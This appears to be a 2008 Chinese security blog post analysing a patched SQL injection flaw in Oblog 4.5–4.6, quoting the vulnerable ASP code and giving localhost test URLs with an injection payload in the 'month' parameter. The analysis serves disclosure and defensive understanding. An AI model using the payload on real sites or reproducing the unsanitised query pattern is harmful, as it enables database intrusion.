Home 电脑技术 exploit Oblog最新注入漏洞分析(已修补)
Oblog最新注入漏洞分析(已修补) E-mail
作者:洋葱圈   
周二, 01 7月 2008 08:17
Tags: 分析文件代码sql漏洞

Date:2008-5-15
Author:Yamato[BCT]
Version:Oblog 4.5-4.6 sql

代码分析:

文件In/Class_UserCommand.asp :

strMonth=Request("month") //第63行

strDay=Request("day")

……
Case "month" //第84行

Dim LastDay

G_P_FileName = G_P_FileName & "month&month=" & strMonth

strDay=Left(strMonth,4) & "-" & Right(strMonth,2) & "-01"

mYear=Left(strMonth,4)

mMonth=Right(strMonth,2)

If InStr ("01,03,05,07,08,10,12",mMonth)> 0 Then

LastDay = "31"……

Else //第109行

SqlPart = " And Addtime >='"&strMonth&"01' AND Addtime < '"&strMonth&LastDay&"' "

构造合适的变量strMonth进行注射

测试方法:

http://localhost/oblog/cmd.asp?do= month&month=2008’ and user>0--01

strDay变量从month中获得日期数据,并判断strDay是否为日期数据。所以构造的注射语句为:

http://localhost/oblog/cmd.asp?do= month&month=2008’(自己的sql语句)--01

执行sql语句采用rst.Open strSql,Conn,1,1

不能修改记录集.


Trackback(0)
Comments (0)Add Comment

Write comment
quote
bold
italicize
underline
strike
url
image
quote
quote
smile
wink
laugh
grin
angry
sad
shocked
cool
tongue
kiss
cry
smaller | bigger

security code
Write the displayed characters


busy
 

最新评论

统计数据

会员 : 5
内容 : 193
友情链接 : 5
内容的浏览数 : 127409
您来自
38.103.63.60
美国 美国 :
浏览器
Unknown Browser Unknown Browser
操作系统
Unknown Operating System Unknown Operating System
当前有 211名访客 在线

友情链接

友情链接

飞豆Rss订阅平台

网站收藏

落伍者

网络部落格

鬼仔's Blog
T4nk
虚幻灵者's blog